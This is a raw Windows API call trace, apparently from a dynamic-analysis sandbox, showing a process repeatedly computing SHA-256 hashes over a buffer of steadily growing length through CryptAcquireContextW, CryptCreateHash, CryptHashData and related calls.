	[0153.482] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.482] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0153.482] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305190
	[0153.482] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305190, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305190, pdwDataLen=0x128aac) returned 1
	[0153.482] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.482] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.482] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.483] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.483] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0153.483] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23051b8
	[0153.483] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23051b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23051b8, pdwDataLen=0x128aac) returned 1
	[0153.483] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.483] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.483] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.483] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.483] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0153.483] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23051e0
	[0153.483] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23051e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23051e0, pdwDataLen=0x128aac) returned 1
	[0153.483] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.483] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.484] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.484] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.484] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0153.484] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305208
	[0153.484] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305208, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305208, pdwDataLen=0x128aac) returned 1
	[0153.484] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.484] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.484] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.484] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.484] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0153.484] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305230
	[0153.485] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305230, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305230, pdwDataLen=0x128aac) returned 1
	[0153.485] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.485] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.485] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.485] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.485] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0153.485] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305258
	[0153.485] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305258, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305258, pdwDataLen=0x128aac) returned 1
	[0153.485] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.485] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.485] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.486] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.486] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0153.486] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305280
	[0153.486] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305280, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305280, pdwDataLen=0x128aac) returned 1
	[0153.486] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.486] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.486] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.486] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.486] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0153.486] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23052a8
	[0153.486] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23052a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23052a8, pdwDataLen=0x128aac) returned 1
	[0153.486] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.486] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.486] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.487] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.487] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0153.487] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23052d0
	[0153.487] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23052d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23052d0, pdwDataLen=0x128aac) returned 1
	[0153.487] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.487] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.487] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.487] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.487] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0153.487] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23052f8
	[0153.487] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23052f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23052f8, pdwDataLen=0x128aac) returned 1
	[0153.487] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.487] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.487] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.488] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.488] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0153.488] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305320
	[0153.488] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305320, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305320, pdwDataLen=0x128aac) returned 1
	[0153.488] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.488] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.488] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.488] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.488] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0153.488] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305348
	[0153.488] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305348, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305348, pdwDataLen=0x128aac) returned 1
	[0153.488] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.488] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.488] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.489] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.489] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0153.489] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.489] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305370
	[0153.489] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305370, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305370, pdwDataLen=0x128aac) returned 1
	[0153.489] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.489] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.490] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.490] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.490] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0153.490] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.490] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305398
	[0153.490] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305398, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305398, pdwDataLen=0x128aac) returned 1
	[0153.490] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.490] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.490] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.490] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.490] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0153.490] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23053c0
	[0153.491] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23053c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23053c0, pdwDataLen=0x128aac) returned 1
	[0153.491] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.491] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.491] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.491] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.491] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0153.491] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23053e8
	[0153.491] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23053e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23053e8, pdwDataLen=0x128aac) returned 1
	[0153.491] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.491] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.491] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.492] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.492] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0153.492] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305410
	[0153.492] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305410, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305410, pdwDataLen=0x128aac) returned 1
	[0153.492] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.492] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.492] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.492] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.492] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0153.492] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305438
	[0153.492] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305438, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305438, pdwDataLen=0x128aac) returned 1
	[0153.492] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.492] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.492] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.493] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.493] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0153.493] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305460
	[0153.493] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305460, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305460, pdwDataLen=0x128aac) returned 1
	[0153.493] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.493] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.493] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.493] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.493] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0153.493] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305488
	[0153.493] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305488, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305488, pdwDataLen=0x128aac) returned 1
	[0153.493] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.493] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.493] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.494] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.494] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0153.494] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.494] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23054b0
	[0153.494] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23054b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23054b0, pdwDataLen=0x128aac) returned 1
	[0153.494] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.494] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.494] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.494] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.494] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0153.494] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.494] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23054d8
	[0153.494] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23054d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23054d8, pdwDataLen=0x128aac) returned 1
	[0153.494] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.494] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.494] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.495] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.495] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0153.495] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305500
	[0153.495] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305500, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305500, pdwDataLen=0x128aac) returned 1
	[0153.495] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.495] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.495] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.495] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.495] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0153.495] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305528
	[0153.495] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305528, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305528, pdwDataLen=0x128aac) returned 1
	[0153.495] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.495] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.496] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.496] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.496] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0153.496] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305550
	[0153.496] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305550, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305550, pdwDataLen=0x128aac) returned 1
	[0153.496] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.496] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.496] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.496] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.496] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0153.497] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
